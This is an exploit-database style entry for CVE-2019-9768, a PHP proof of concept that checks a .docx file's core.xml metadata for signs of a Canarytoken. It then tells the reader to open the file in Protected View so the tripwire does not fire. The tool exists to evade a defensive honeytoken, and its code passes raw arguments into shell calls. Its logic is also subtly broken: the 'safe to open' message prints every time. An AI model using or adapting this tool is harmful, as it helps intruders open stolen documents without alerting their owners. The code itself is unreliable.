Canarytokens 2019-03-01 – Detection Bypass

  • 作者: Benjamin Zink Loft, Gionathan Reale
    日期: 2019-03-21
  • 类别:
  • 来源:
  • ## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
    # Date: 20.03.2019
    # Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale 
    # Vendor Homepage:
    # Version: up to 2019-03-01
    # Software Link:
    # Google Dork: N/A 
    # CVE: 2019-9768 
    # PoC:
    # Requires unzip:
    # sudo apt-get install unzip
    system('unzip ' . $argv[1] . '.docx');
    system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
    $strFile = file_get_contents("docProps/core.xml");
    if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
     echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
     echo "Should be safe to open normally";